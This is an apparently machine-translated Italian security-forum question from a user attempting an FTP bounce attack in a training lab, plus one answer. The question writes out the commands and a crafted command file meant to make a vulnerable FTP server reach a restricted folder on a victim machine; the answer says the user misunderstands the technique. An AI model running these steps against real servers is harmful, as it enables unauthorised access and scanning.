FTP Bounce attack, cosa c'è che non va?

Naviga le tue risposte
1

Sto studiando sicurezza in un laboratorio di formazione e sto cercando di implementare l'infame attacco FTP-rimbalzo.  Userò un server FTP remoto (chiamato qui BOUNCE) per accedere a una cartella sulla macchina VICTIM che è proibita per il mio indirizzo IP. Non so se la macchina VICTIM consentirà l'accesso alla cartella vietata su BOUNCE, ma vale comunque la pena provare:).

Ecco cosa faccio:

Inizio il mio server pure-ftp e mi connetto ad esso: 

service pure-ftpd start

~# ftp My_IP 21
ftp> USER my_own_username

Quindi, dico al mio server di passare in modalità passiva, risponde con un indirizzo IP (che è il mio indirizzo IP) e una PORTA con una forma come: (F, F, F, F, X, X) Ne prendo nota per dopo. 

ftp> quote "pasv"   
Entering Passive Mode (F,F,F,F,X,X)

E infine, dico al mio server di accettare i dati dal canale dati e li memorizziamo nel file foobar , se non esiste, il server ne crea uno. 

ftp> quote "stor foobar"

Dopo questo, il mio server (che è in modalità passiva ora) si bloccherà ...

Ora utilizzerò un server vulnerabile FTP-bounce (che ho trovato grazie a nmap che mostra il messaggio "Ftp-Bounce Working!") che chiamerò "Bounce". Se ho capito bene, quest'ultimo è in grado di connettersi ad altri server FTP usando il comando PORT. Fortunatamente posso connettermi a Bounce in modo anonimo e caricare alcuni file su di esso utilizzando il comando PUT.

Successivamente, importerò il seguente file su Bounce: 

user anonymous
pass whatyouwant
cd /restricted-folder
port F,F,F,F,X,X
ls
quit
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
...

Verrà quindi caricato da Bounce a Victim Machine per consentire a quest'ultimo di eseguire le istruzioni in.

Lo faccio con quegli ultimi comandi (ancora su Bounce): 

put instrs
quote "port C,C,C,C,0,21"
quote "retr instrs"

Dove C,C,C,0,21 è l'IP della macchina vittima (chiamiamola VICTIM). (Quindi si connetterà a VICTIM e dirà di eseguire l'istruzione nel file instrs, se ho capito correttamente).

Problema : subito dopo il comando quote "retr instrs ottengo il seguente errore: 501 Cannot RETR. Error

Quindi, mi chiedo, è VITTIMA o BOUNCE che impedisce anche il comando RETR di funzionare? Dimmi anche, se pensi di aver frainteso qualcosa. Grazie mille per te attenzione.

    
posta ahg8tOPk78 17.10.2016 - 16:27
fonte

1 risposta

0

Non hai capito gli attacchi FTP Bounce.

Gli attacchi FTP Bounce non consentono a un FTP di connettersi a un altro, ma di richiedere l'accesso alle porte utilizzando il comando PORT. Viene principalmente utilizzato per effettuare una scansione delle porte senza essere rilevato (come non lo si sta facendo tu, ma il server FTP per te), o anche per D.o.S. attacchi.

Girando questo FTP-bounce per caricare un file da un server FTP a un altro (come sembra che tu voglia fare, scusa se ti ho frainteso) richiede molto più di questo.

Quindi il comando PORT potrebbe funzionare, ma non RETR

    
risposta data 17.10.2016 - 16:41
fonte

Leggi altre domande sui tag

C'è un sacco di connessioni TCP sul mio PC a '9gag' Come utilizzare SQLMap / Burp per eseguire l'iniezione SQL su un modulo dietro a un altro modulo